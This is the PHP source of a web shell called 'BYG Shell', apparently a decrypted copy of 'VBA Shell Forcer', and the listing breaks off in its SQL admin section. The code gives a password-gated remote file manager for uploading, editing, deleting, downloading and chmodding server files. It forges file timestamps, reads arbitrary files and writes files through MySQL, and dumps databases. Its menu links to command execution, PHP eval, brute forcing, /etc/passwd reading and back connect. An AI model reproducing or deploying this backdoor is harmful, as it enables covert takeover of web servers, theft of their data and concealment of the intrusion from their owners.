byg.php (Decrypted and Remove Email)

1.  
2. <?php
3. /****************************************\
4. |* VBA SHELL FORCER - VERSION 2.1 *|
5. |* Edit & Develop by VBATEAM *|
6. |* http://vbateam.net *|
7. |* == Hacking & Security == *|
8. \****************************************/
9.  
10. /****************************************\
11. |* DECRYPTED AND REMOVE EMAIL *|
12. |* Edit by k25 *|
13. |* http://www.linuxteamvietnam.us *|
14. |* == Linux & Hacking & Security == *|
15. \****************************************/
16.  
17. error_reporting(7);
18. @set_magic_quotes_runtime(0);
19. ob_start();
20. $mtime = explode(' ', microtime());
21. $starttime = $mtime[1] + $mtime[0];
22. define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)).'/');
23. //define('IS_WIN', strstr(PHP_OS, 'WIN') ? 1 : 0 );
24. define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
25. define('IS_COM', class_exists('COM') ? 1 : 0 );
26. define('IS_GPC', get_magic_quotes_gpc());
27. $dis_func = get_cfg_var('disable_functions');
28. define('IS_PHPINFO', (!eregi("phpinfo",$dis_func)) ? 1 : 0 );
29. @set_time_limit(0);
30.  
31. foreach(array('_GET','_POST') as $_request) {
32. foreach($$_request as $_key => $_value) {
33. if ($_key{0} != '_') {
34. if (IS_GPC) {
35. $_value = s_array($_value);
36. }
37. $$_key = $_value;
38. }
39. }
40. }
41.  
42. /*================= Info Login ================*/
43. $admin = array();
44. $admin['check'] = true;
45. $admin['pass'] = 'byg'; // Password login
46. $admin['cookiepre'] = '';
47. $admin['cookiedomain'] = '';
48. $admin['cookiepath'] = '/';
49. $admin['cookielife'] = 86400;
50. /*===================== End =====================*/
51.  
52. if ($charset == 'utf8') {
53. header("content-Type: text/html; charset=utf-8");
54. } elseif ($charset == 'big5') {
55. header("content-Type: text/html; charset=big5");
56. } elseif ($charset == 'gbk') {
57. header("content-Type: text/html; charset=gbk");
58. } elseif ($charset == 'latin1') {
59. header("content-Type: text/html; charset=iso-8859-2");
60. }
61.  
62. $self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
63. $timestamp = time();
64.  
65. /*===================== Login =====================*/
66. if ($action == "logout") {
67. scookie('vbapass', '', -86400 * 365);
68. p('<meta http-equiv="refresh" content="0;URL='.$self.'">');
69. p('<body background=black>');
70. exit;
71. }
72. if($admin['check']) {
73. if ($doing == 'login') {
74. if ($admin['pass'] == $password) {
75. scookie('vbapass', $password);
76.  
77. p('<meta http-equiv="refresh" content="2;URL='.$self.'">');
78. p('<body bgcolor=black>
79. <BR><BR><div align=center><font color=yellow face=tahoma size=2>BYG Shell - Decrypted and Remove Email - Please wait...<BR><img src=http://t3.gstatic.com/images?q=tbn:ANd9GcRFIQy9oLc9jMWmDY_N_sxjWPyusUWC4igwK2lqBm68aDGcSfKPPA></div>');
80. exit;
81. }
82.  
83. else
84. {
85. $err_mess = '<table width=100%><tr><td bgcolor=#0E0E0E width=100% height=24><div align=center><font color=red face=tahoma size=2><blink>Password incorrect, Please try again!!!</blink><BR></font></div></td></tr></table>';
86. echo $err_mess;
87. }}
88. if ($_COOKIE['vbapass']) {
89. if ($_COOKIE['vbapass'] != $admin['pass']) {
90. loginpage();
91. }
92. } else {
93. loginpage();
94. }
95. }
96. /*===================== Login =====================*/
97.  
98. $errmsg = '';
99.  
100. if ($action == 'phpinfo') {
101. if (IS_PHPINFO) {
102. phpinfo();
103. } else {
104. $errmsg = 'phpinfo() function has non-permissible';
105. }
106. }
107.  
108.  
109. if ($doing == 'downfile' && $thefile) {
110. if (!@file_exists($thefile)) {
111. $errmsg = 'The file you want Downloadable was nonexistent';
112. } else {
113. $fileinfo = pathinfo($thefile);
114. header('Content-type: application/x-'.$fileinfo['extension']);
115. header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
116. header('Content-Length: '.filesize($thefile));
117. @readfile($thefile);
118. exit;
119. }
120. }
121.  
122.  
123. if ($doing == 'backupmysql' && !$saveasfile) {
124. dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
125. $table = array_flip($table);
126. $result = q("SHOW tables");
127. if (!$result) p('<h2>'.mysql_error().'</h2>');
128. $filename = basename($_SERVER['HTTP_HOST'].'_MySQL.sql');
129. header('Content-type: application/unknown');
130. header('Content-Disposition: attachment; filename='.$filename);
131. $mysqldata = '';
132. while ($currow = mysql_fetch_array($result)) {
133. if (isset($table[$currow[0]])) {
134. $mysqldata .= sqldumptable($currow[0]);
135. }
136. }
137. mysql_close();
138. exit;
139. }
140.  
141. // Mysql
142. if($doing=='mysqldown'){
143. if (!$dbname) {
144. $errmsg = 'Please input dbname';
145. } else {
146. dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
147. if (!file_exists($mysqldlfile)) {
148. $errmsg = 'The file you want Downloadable was nonexistent';
149. } else {
150. $result = q("select load_file('$mysqldlfile');");
151. if(!$result){
152. q("DROP TABLE IF EXISTS tmp_angel;");
153. q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);");
154. //Download SQL
155. q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';");
156. $result = q("select content from tmp_angel");
157. q("DROP TABLE tmp_angel");
158. }
159. $row = @mysql_fetch_array($result);
160. if (!$row) {
161. $errmsg = 'Load file failed '.mysql_error();
162. } else {
163. $fileinfo = pathinfo($mysqldlfile);
164. header('Content-type: application/x-'.$fileinfo['extension']);
165. header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
166. header("Accept-Length: ".strlen($row[0]));
167. echo $row[0];
168. exit;
169. }
170. }
171. }
172. }
173.  
174. ?>
175. <html>
176. <head>
177. <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
178. <title><?php echo str_replace('.','','BYG - The Legend of Vietnamese Hacker World');?></title>
179. <style type="text/css">
180. body,td{font: 10pt Tahoma;color:gray;line-height: 16px;}
181.  
182. a {color: #74A202;text-decoration:none;}
183. a:hover{color: #f00;text-decoration:underline;}
184. .alt1 td{border-top:1px solid gray;border-bottom:1px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}
185. .alt2 td{border-top:1px solid gray;border-bottom:1px solid gray;background:#f9f9f9;padding:5px 10px 5px 5px;}
186. .focus td{border-top:1px solid gray;border-bottom:0px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}
187. .fout1 td{border-top:1px solid gray;border-bottom:0px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}
188. .fout td{border-top:1px solid gray;border-bottom:0px solid gray;background:#202020;padding:5px 10px 5px 5px;}
189. .head td{border-top:1px solid gray;border-bottom:1px solid gray;background:#202020;padding:5px 10px 5px 5px;font-weight:bold;}
190. .head_small td{border-top:1px solid gray;border-bottom:1px solid gray;background:#202020;padding:5px 10px 5px 5px;font-weight:normal;font-size:8pt;}
191. .head td span{font-weight:normal;}
192. form{margin:0;padding:0;}
193. h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
194. ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
195. u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
196. input, textarea, button
197. {
198. font-size: 9pt;
199. color: #ccc;
200. font-family: verdana, sans-serif;
201. background-color: #202020;
202. border-left: 1px solid #74A202;
203. border-top: 1px solid #74A202;
204. border-right: 1px solid #74A202;
205. border-bottom: 1px solid #74A202;
206. }
207. select
208. {
209. font-size: 8pt;
210. font-weight: normal;
211. color: #ccc;
212. font-family: verdana, sans-serif;
213. background-color: #202020;
214. }
215.  
216. </style>
217. <script type="text/javascript">
218. function CheckAll(form) {
219. for(var i=0;i<form.elements.length;i++) {
220. var e = form.elements[i];
221. if (e.name != 'chkall')
222. e.checked = form.chkall.checked;
223. }
224. }
225. function $(id) {
226. return document.getElementById(id);
227. }
228. function goaction(act){
229. $('goaction').action.value=act;
230. $('goaction').submit();
231. }
232. </script>
233. </head>
234. <body onLoad="init()" style="margin:0;table-layout:fixed; word-break:break-all" bgcolor=black>
235.  
236.  
237. <div border="0" style="position:fixed; width: 100%; height: 25px; z-index: 1; top: 300px; left: 0;" id="loading" align="center" valign="center">
238. <table border="1" width="110px" cellspacing="0" cellpadding="0" style="border-collapse: collapse" bordercolor="#003300">
239. <tr>
240. <td align="center" valign=center>
241. <div border="1" style="background-color: #0E0E0E; filter: alpha(opacity=70); opacity: .7; width: 110px; height: 25px; z-index: 1; border-collapse: collapse;" bordercolor="#006600" align="center">
242. Loading<img src="http://i382.photobucket.com/albums/oo263/vnhacker/loading.gif">
243. </div>
244. </td>
245. </tr>
246. </table>
247. </div>
248. <script>
249. var ld=(document.all);
250. var ns4=document.layers;
251. var ns6=document.getElementById&&!document.all;
252. var ie4=document.all;
253. if (ns4)
254. ld=document.loading;
255. else if (ns6)
256. ld=document.getElementById("loading").style;
257. else if (ie4)
258. ld=document.all.loading.style;
259. function init()
260. {
261. if(ns4){ld.visibility="hidden";}
262. else if (ns6||ie4) ld.display="none";
263. }
264. </script>
265.  
266.  
267.  
268.  
269. <table width="100%" border="0" cellpadding="0" cellspacing="0">
270. <tr class="head_small">
271. <td width=100%>
272. <table width=100%><tr class="head_small"><td width=86px><a title="BYG - The Legend of Vietnamese Hacker World" href="<?php $self;?>"><img src=https://lh3.ggpht.com/sBbOb83wcJBRP_9lvptlwwmkdX-JFibvEgqV3bAM5YIJSnjbq1OscUxhCmOdU5wVcg=w300 height=86 border=0></a></td><td>
273. <span style="float:left;"> <?php echo "Hostname: ".$_SERVER['HTTP_HOST']."";?> | <a href="http://google.com" target="_blank"><?php echo str_replace('.','','BYG Shell - Decrypted and Remove Email');?> </a> | <a href="javascript:goaction('logout');"><font color=red>Logout</font></a></span> <br />
274.  
275. <?php
276. $curl_on = @function_exists('curl_version');
277. $mysql_on = @function_exists('mysql_connect');
278. $mssql_on = @function_exists('mssql_connect');
279. $pg_on = @function_exists('pg_connect');
280. $ora_on = @function_exists('ocilogon');
281.  
282. echo (($safe_mode)?("Safe_mod: <b><font color=green>ON</font></b> - "):("Safe_mod: <b><font color=red>OFF</font></b> - "));
283. echo "PHP version: <b>".@phpversion()."</b> - ";
284. echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b> - "):("<b><font color=red>OFF</font></b> - "));
285. echo "MySQL: <b>";
286. $mysql_on = @function_exists('mysql_connect');
287. if($mysql_on){
288. echo "<font color=green>ON</font></b> - "; } else { echo "<font color=red>OFF</font></b> - "; }
289. echo "MSSQL: <b>";
290. $mssql_on = @function_exists('mssql_connect');
291. if($mssql_on){echo "<font color=green>ON</font></b> - ";}else{echo "<font color=red>OFF</font></b> - ";}
292. echo "PostgreSQL: <b>";
293. $pg_on = @function_exists('pg_connect');
294. if($pg_on){echo "<font color=green>ON</font></b> - ";}else{echo "<font color=red>OFF</font></b> - ";}
295. echo "Oracle: <b>";
296. $ora_on = @function_exists('ocilogon');
297. if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b><BR>";}
298.  
299. echo "Disable functions : <b>";
300. if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b><BR>";}else{echo "<font color=red>$df</font></b><BR>";}
301.  
302. echo "<font color=white>Uname -a</font>: ".@substr(@php_uname(),0,120)."<br>";
303. echo "<font color=white>Server</font>: ".@substr($SERVER_SOFTWARE,0,120)." - <font color=white>id</font>: ".@getmyuid()."(".@get_current_user().") - uid=".@getmyuid()." (".@get_current_user().") gid=".@getmygid()."(".@get_current_user().")<br>";
304. ?>
305. </td></tr></table></td>
306. </tr>
307. <tr class="alt1">
308. <td width=10%><span style="float:left;">[Server IP: <?php echo "<font color=yellow>".gethostbyname($_SERVER['SERVER_NAME'])."</font>";?> - Your IP: <?php echo "<font color=yellow>".$_SERVER['REMOTE_ADDR']."</font>";?>] </span> <br />
309. --------------------------------------------------------------------------------------<br />
310.  
311. <a href="javascript:goaction('file');">File Manager</a> |
312. <a href="javascript:goaction('sqladmin');">MySQL Manager</a> |
313. <a href="javascript:goaction('sqlfile');">MySQL Upload &amp; Download</a> |
314. <a href="javascript:goaction('shell');">Execute Command</a> |
315. <a href="javascript:goaction('phpenv');">PHP Variable</a> |
316. <a href="javascript:goaction('eval');">Eval PHP Code</a>
317. <?php if (!IS_WIN) {?> | <a href="javascript:goaction('brute');">Brute</a> <?php }?>
318. <?php if (!IS_WIN) {?> | <a href="javascript:goaction('etcpwd');">/etc/passwd</a> <?php }?>
319. <?php if (!IS_WIN) {?> | <a href="javascript:goaction('backconnect');">Back Connect</a><?php }?>
320. </td>
321. </tr>
322. </table>
323. <table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
324. <?php
325.  
326. formhead(array('name'=>'goaction'));
327. makehide('action');
328. formfoot();
329.  
330. $errmsg && m($errmsg);
331.  
332. // Dir function
333. !$dir && $dir = '.';
334. $nowpath = getPath(SA_ROOT, $dir);
335. if (substr($dir, -1) != '/') {
336. $dir = $dir.'/';
337. }
338. $uedir = ue($dir);
339.  
340. if (!$action || $action == 'file') {
341.  
342. // Non-writeable
343. $dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable';
344.  
345. // Delete dir
346. if ($doing == 'deldir' && $thefile) {
347. if (!file_exists($thefile)) {
348. m($thefile.' directory does not exist');
349. } else {
350. m('Directory delete '.(deltree($thefile) ? basename($thefile).' success' : 'failed'));
351. }
352. }
353.  
354. // Create new dir
355. elseif ($newdirname) {
356. $mkdirs = $nowpath.$newdirname;
357. if (file_exists($mkdirs)) {
358. m('Directory has already existed');
359. } else {
360. m('Directory created '.(@mkdir($mkdirs,0777) ? 'success' : 'failed'));
361. @chmod($mkdirs,0777);
362. }
363. }
364.  
365. // Upload file
366. elseif ($doupfile) {
367. m('File upload '.(@copy($_FILES['uploadfile']['tmp_name'],$uploaddir.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed'));
368. }
369.  
370. // Edit file
371. elseif ($editfilename && $filecontent) {
372. $fp = @fopen($editfilename,'w');
373. m('Save file '.(@fwrite($fp,$filecontent) ? 'success' : 'failed'));
374. @fclose($fp);
375. }
376.  
377. // Modify
378. elseif ($pfile && $newperm) {
379. if (!file_exists($pfile)) {
380. m('The original file does not exist');
381. } else {
382. $newperm = base_convert($newperm,8,10);
383. m('Modify file attributes '.(@chmod($pfile,$newperm) ? 'success' : 'failed'));
384. }
385. }
386.  
387. // Rename
388. elseif ($oldname && $newfilename) {
389. $nname = $nowpath.$newfilename;
390. if (file_exists($nname) || !file_exists($oldname)) {
391. m($nname.' has already existed or original file does not exist');
392. } else {
393. m(basename($oldname).' renamed '.basename($nname).(@rename($oldname,$nname) ? ' success' : 'failed'));
394. }
395. }
396.  
397. // Copu
398. elseif ($sname && $tofile) {
399. if (file_exists($tofile) || !file_exists($sname)) {
400. m('The goal file has already existed or original file does not exist');
401. } else {
402. m(basename($tofile).' copied '.(@copy($sname,$tofile) ? basename($tofile).' success' : 'failed'));
403. }
404. }
405.  
406. // File exit
407. elseif ($curfile && $tarfile) {
408. if (!@file_exists($curfile) || !@file_exists($tarfile)) {
409. m('The goal file has already existed or original file does not exist');
410. } else {
411. $time = @filemtime($tarfile);
412. m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
413. }
414. }
415.  
416. // Date
417. elseif ($curfile && $year && $month && $day && $hour && $minute && $second) {
418. if (!@file_exists($curfile)) {
419. m(basename($curfile).' does not exist');
420. } else {
421. $time = strtotime("$year-$month-$day $hour:$minute:$second");
422. m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
423. }
424. }
425.  
426. // Download
427. elseif($doing == 'downrar') {
428. if ($dl) {
429. $dfiles='';
430. foreach ($dl as $filepath => $value) {
431. $dfiles.=$filepath.',';
432. }
433. $dfiles=substr($dfiles,0,strlen($dfiles)-1);
434. $dl=explode(',',$dfiles);
435. $zip=new PHPZip($dl);
436. $code=$zip->out;
437. header('Content-type: application/octet-stream');
438. header('Accept-Ranges: bytes');
439. header('Accept-Length: '.strlen($code));
440. header('Content-Disposition: attachment;filename='.$_SERVER['HTTP_HOST'].'_Files.tar.gz');
441. echo $code;
442. exit;
443. } else {
444. m('Please select file(s)');
445. }
446. }
447.  
448. // Delete file
449. elseif($doing == 'delfiles') {
450. if ($dl) {
451. $dfiles='';
452. $succ = $fail = 0;
453. foreach ($dl as $filepath => $value) {
454. if (@unlink($filepath)) {
455. $succ++;
456. } else {
457. $fail++;
458. }
459. }
460. m('Deleted file have finished??choose '.count($dl).' success '.$succ.' fail '.$fail);
461. } else {
462. m('Please select file(s)');
463. }
464. }
465.  
466. // Function Newdir
467. formhead(array('name'=>'createdir'));
468. makehide('newdirname');
469. makehide('dir',$nowpath);
470. formfoot();
471. formhead(array('name'=>'fileperm'));
472. makehide('newperm');
473. makehide('pfile');
474. makehide('dir',$nowpath);
475. formfoot();
476. formhead(array('name'=>'copyfile'));
477. makehide('sname');
478. makehide('tofile');
479. makehide('dir',$nowpath);
480. formfoot();
481. formhead(array('name'=>'rename'));
482. makehide('oldname');
483. makehide('newfilename');
484. makehide('dir',$nowpath);
485. formfoot();
486. formhead(array('name'=>'fileopform'));
487. makehide('action');
488. makehide('opfile');
489. makehide('dir');
490. formfoot();
491.  
492. $free = @disk_free_space($nowpath);
493. !$free && $free = 0;
494. $all = @disk_total_space($nowpath);
495. !$all && $all = 0;
496. $used = $all-$free;
497. $used_percent = @round(100/($all/$free),2);
498. p('<font color=yellow face=tahoma size=2><B>File Manager</b> </font> Current disk free <font color=red>'.sizecount($free).'</font> of <font color=red>'.sizecount($all).'</font> (<font color=red>'.$used_percent.'</font>%)</font>');
499.  
500. ?>
501. <table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
502. <form action="" method="post" id="godir" name="godir">
503. <tr>
504. <td nowrap>Current Directory (<?php echo $dir_writeable;?>, <?php echo getChmod($nowpath);?>)</td>
505. <td width="100%"><input name="view_writable" value="0" type="hidden" /><input class="input" name="dir" value="<?php echo $nowpath;?>" type="text" style="width:100%;margin:0 8px;"></td>
506. <td nowrap><input class="bt" value="GO" type="submit"></td>
507. </tr>
508. </form>
509. </table>
510. <script type="text/javascript">
511. function createdir(){
512. var newdirname;
513. newdirname = prompt('Please input the directory name:', '');
514. if (!newdirname) return;
515. $('createdir').newdirname.value=newdirname;
516. $('createdir').submit();
517. }
518. function fileperm(pfile){
519. var newperm;
520. newperm = prompt('Current file:'+pfile+'\nPlease input new attribute:', '');
521. if (!newperm) return;
522. $('fileperm').newperm.value=newperm;
523. $('fileperm').pfile.value=pfile;
524. $('fileperm').submit();
525. }
526. function copyfile(sname){
527. var tofile;
528. tofile = prompt('Original file:'+sname+'\nPlease input object file (fullpath):', '');
529. if (!tofile) return;
530. $('copyfile').tofile.value=tofile;
531. $('copyfile').sname.value=sname;
532. $('copyfile').submit();
533. }
534. function rename(oldname){
535. var newfilename;
536. newfilename = prompt('Former file name:'+oldname+'\nPlease input new filename:', '');
537. if (!newfilename) return;
538. $('rename').newfilename.value=newfilename;
539. $('rename').oldname.value=oldname;
540. $('rename').submit();
541. }
542. function dofile(doing,thefile,m){
543. if (m && !confirm(m)) {
544. return;
545. }
546. $('filelist').doing.value=doing;
547. if (thefile){
548. $('filelist').thefile.value=thefile;
549. }
550. $('filelist').submit();
551. }
552. function createfile(nowpath){
553. var filename;
554. filename = prompt('Please input the file name:', '');
555. if (!filename) return;
556. opfile('editfile',nowpath + filename,nowpath);
557. }
558. function opfile(action,opfile,dir){
559. $('fileopform').action.value=action;
560. $('fileopform').opfile.value=opfile;
561. $('fileopform').dir.value=dir;
562. $('fileopform').submit();
563. }
564. function godir(dir,view_writable){
565. if (view_writable) {
566. $('godir').view_writable.value=1;
567. }
568. $('godir').dir.value=dir;
569. $('godir').submit();
570. }
571. </script>
572. <?php
573. tbhead();
574. p('<form action="'.$self.'" method="POST" enctype="multipart/form-data"><tr class="alt1"><td colspan="7" style="padding:5px;">');
575. p('<div style="float:right;"><input class="input" name="uploadfile" value="" type="file" /> <input class="" name="doupfile" value="Upload" type="submit" /><input name="uploaddir" value="'.$dir.'" type="hidden" /><input name="dir" value="'.$dir.'" type="hidden" /></div>');
576. p('<a href="javascript:godir(\''.$_SERVER["DOCUMENT_ROOT"].'\');">WebRoot</a>');
577. if ($view_writable) {
578. p(' | <a href="javascript:godir(\''.$nowpath.'\');">View All</a>');
579. } else {
580. p(' | <a href="javascript:godir(\''.$nowpath.'\',\'1\');">View Writable</a>');
581. }
582. p(' | <a href="javascript:createdir();">Create Directory</a> | <a href="javascript:createfile(\''.$nowpath.'\');">Create File</a>');
583. if (IS_WIN && IS_COM) {
584. $obj = new COM('scripting.filesystemobject');
585. if ($obj && is_object($obj)) {
586. $DriveTypeDB = array(0 => 'Unknow',1 => 'Removable',2 => 'Fixed',3 => 'Network',4 => 'CDRom',5 => 'RAM Disk');
587. foreach($obj->Drives as $drive) {
588. if ($drive->DriveType == 2) {
589. p(' | <a href="javascript:godir(\''.$drive->Path.'/\');" title="Size:'.sizecount($drive->TotalSize).'&#13;Free:'.sizecount($drive->FreeSpace).'&#13;Type:'.$DriveTypeDB[$drive->DriveType].'">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');
590. } else {
591. p(' | <a href="javascript:godir(\''.$drive->Path.'/\');" title="Type:'.$DriveTypeDB[$drive->DriveType].'">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');
592. }
593. }
594. }
595. }
596.  
597. p('</td></tr></form>');
598.  
599. p('<tr class="head"><td>&nbsp;</td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>');
600.  
601. // Get path
602. $dirdata=array();
603. $filedata=array();
604.  
605. if ($view_writable) {
606. $dirdata = GetList($nowpath);
607. } else {
608. // Open dir
609. $dirs=@opendir($dir);
610. while ($file=@readdir($dirs)) {
611. $filepath=$nowpath.$file;
612. if(@is_dir($filepath)){
613. $dirdb['filename']=$file;
614. $dirdb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
615. $dirdb['dirchmod']=getChmod($filepath);
616. $dirdb['dirperm']=getPerms($filepath);
617. $dirdb['fileowner']=getUser($filepath);
618. $dirdb['dirlink']=$nowpath;
619. $dirdb['server_link']=$filepath;
620. $dirdb['client_link']=ue($filepath);
621. $dirdata[]=$dirdb;
622. } else {
623. $filedb['filename']=$file;
624. $filedb['size']=sizecount(@filesize($filepath));
625. $filedb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
626. $filedb['filechmod']=getChmod($filepath);
627. $filedb['fileperm']=getPerms($filepath);
628. $filedb['fileowner']=getUser($filepath);
629. $filedb['dirlink']=$nowpath;
630. $filedb['server_link']=$filepath;
631. $filedb['client_link']=ue($filepath);
632. $filedata[]=$filedb;
633. }
634. }// while
635. unset($dirdb);
636. unset($filedb);
637. @closedir($dirs);
638. }
639. @sort($dirdata);
640. @sort($filedata);
641. $dir_i = '0';
642. foreach($dirdata as $key => $dirdb){
643. if($dirdb['filename']!='..' && $dirdb['filename']!='.') {
644. $thisbg = bg();
645. p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
646. p('<td width="2%" nowrap><font face="wingdings" size="3">0</font></td>');
647. p('<td><a href="javascript:godir(\''.$dirdb['server_link'].'\');">'.$dirdb['filename'].'</a></td>');
648. p('<td nowrap>'.$dirdb['mtime'].'</td>');
649. p('<td nowrap>--</td>');
650. p('<td nowrap>');
651. p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirchmod'].'</a> / ');
652. p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirperm'].'</a>'.$dirdb['fileowner'].'</td>');
653. p('<td nowrap><a href="javascript:dofile(\'deldir\',\''.$dirdb['server_link'].'\',\'Are you sure will delete '.$dirdb['filename'].'? \\n\\nIf non-empty directory, will be delete all the files.\')">Del</a> | <a href="javascript:rename(\''.$dirdb['server_link'].'\');">Rename</a></td>');
654. p('</tr>');
655. $dir_i++;
656. } else {
657. if($dirdb['filename']=='..') {
658. p('<tr class=fout>');
659. p('<td align="center"><font face="Wingdings 3" size=4>=</font></td><td nowrap colspan="5"><a href="javascript:godir(\''.getUpPath($nowpath).'\');">Parent Directory</a></td>');
660. p('</tr>');
661. }
662. }
663. }
664.  
665. p('<tr bgcolor="green" stlye="border-top:1px solid gray;border-bottom:1px solid gray;"><td colspan="6" height="5"></td></tr>');
666. p('<form id="filelist" name="filelist" action="'.$self.'" method="post">');
667. makehide('action','file');
668. makehide('thefile');
669. makehide('doing');
670. makehide('dir',$nowpath);
671. $file_i = '0';
672. foreach($filedata as $key => $filedb){
673. if($filedb['filename']!='..' && $filedb['filename']!='.') {
674. $fileurl = str_replace(SA_ROOT,'',$filedb['server_link']);
675. $thisbg = bg();
676. p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
677. p('<td width="2%" nowrap><input type="checkbox" value="1" name="dl['.$filedb['server_link'].']"></td>');
678. p('<td><a href="'.$fileurl.'" target="_blank">'.$filedb['filename'].'</a></td>');
679. p('<td nowrap>'.$filedb['mtime'].'</td>');
680. p('<td nowrap>'.$filedb['size'].'</td>');
681. p('<td nowrap>');
682. p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['filechmod'].'</a> / ');
683. p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['fileperm'].'</a>'.$filedb['fileowner'].'</td>');
684. p('<td nowrap>');
685. p('<a href="javascript:dofile(\'downfile\',\''.$filedb['server_link'].'\');">Down</a> | ');
686. p('<a href="javascript:copyfile(\''.$filedb['server_link'].'\');">Copy</a> | ');
687. p('<a href="javascript:opfile(\'editfile\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Edit</a> | ');
688. p('<a href="javascript:rename(\''.$filedb['server_link'].'\');">Rename</a> | ');
689. p('<a href="javascript:opfile(\'newtime\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Time</a>');
690. p('</td></tr>');
691. $file_i++;
692. }
693. }
694. p('<tr class="fout1"><td align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td><td><a href="javascript:dofile(\'downrar\');">Packing download selected</a> - <a href="javascript:dofile(\'delfiles\');">Delete selected</a></td><td colspan="4" align="right">'.$dir_i.' directories / '.$file_i.' files</td></tr>');
695. p('</form></table>');
696. }// end dir
697.  
698. elseif ($action == 'sqlfile') {
699. if($doing=="mysqlupload"){
700. $file = $_FILES['uploadfile'];
701. $filename = $file['tmp_name'];
702. if (file_exists($savepath)) {
703. m('The goal file has already existed');
704. } else {
705. if(!$filename) {
706. m('Please choose a file');
707. } else {
708. $fp=@fopen($filename,'r');
709. $contents=@fread($fp, filesize($filename));
710. @fclose($fp);
711. $contents = bin2hex($contents);
712. if(!$upname) $upname = $file['name'];
713. dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
714. $result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';");
715. m($result ? 'Upload success' : 'Upload has failed: '.mysql_error());
716. }
717. }
718. }
719. ?>
720. <script type="text/javascript">
721. function mysqlfile(doing){
722. if(!doing) return;
723. $('doing').value=doing;
724. $('mysqlfile').dbhost.value=$('dbinfo').dbhost.value;
725. $('mysqlfile').dbport.value=$('dbinfo').dbport.value;
726. $('mysqlfile').dbuser.value=$('dbinfo').dbuser.value;
727. $('mysqlfile').dbpass.value=$('dbinfo').dbpass.value;
728. $('mysqlfile').dbname.value=$('dbinfo').dbname.value;
729. $('mysqlfile').charset.value=$('dbinfo').charset.value;
730. $('mysqlfile').submit();
731. }
732. </script>
733. <?php
734. !$dbhost && $dbhost = 'localhost';
735. !$dbuser && $dbuser = 'root';
736. !$dbport && $dbport = '3306';
737. $charsets = array(''=>'Default','gbk'=>'GBK', 'big5'=>'Big5', 'utf8'=>'UTF-8', 'latin1'=>'Latin1');
738. formhead(array('title'=>'MYSQL Information','name'=>'dbinfo'));
739. makehide('action','sqlfile');
740. p('<p>');
741. p('DBHost:');
742. makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
743. p(':');
744. makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
745. p('DBUser:');
746. makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
747. p('DBPass:');
748. makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
749. p('DBName:');
750. makeinput(array('name'=>'dbname','size'=>15,'value'=>$dbname));
751. p('DBCharset:');
752. makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset));
753. p('</p>');
754. formfoot();
755. p('<form action="'.$self.'" method="POST" enctype="multipart/form-data" name="mysqlfile" id="mysqlfile">');
756. p('<h2>Upload file</h2>');
757. p('<p><b>This operation the DB user must has FILE privilege</b></p>');
758. p('<p>Save path(fullpath): <input class="input" name="savepath" size="45" type="text" /> Choose a file: <input class="input" name="uploadfile" type="file" /> <a href="javascript:mysqlfile(\'mysqlupload\');">Upload</a></p>');
759. p('<h2>Download file</h2>');
760. p('<p>File: <input class="input" name="mysqldlfile" size="115" type="text" /> <a href="javascript:mysqlfile(\'mysqldown\');">Download</a></p>');
761. makehide('dbhost');
762. makehide('dbport');
763. makehide('dbuser');
764. makehide('dbpass');
765. makehide('dbname');
766. makehide('charset');
767. makehide('doing');
768. makehide('action','sqlfile');
769. p('</form>');
770. }
771.  
772. elseif ($action == 'sqladmin') {
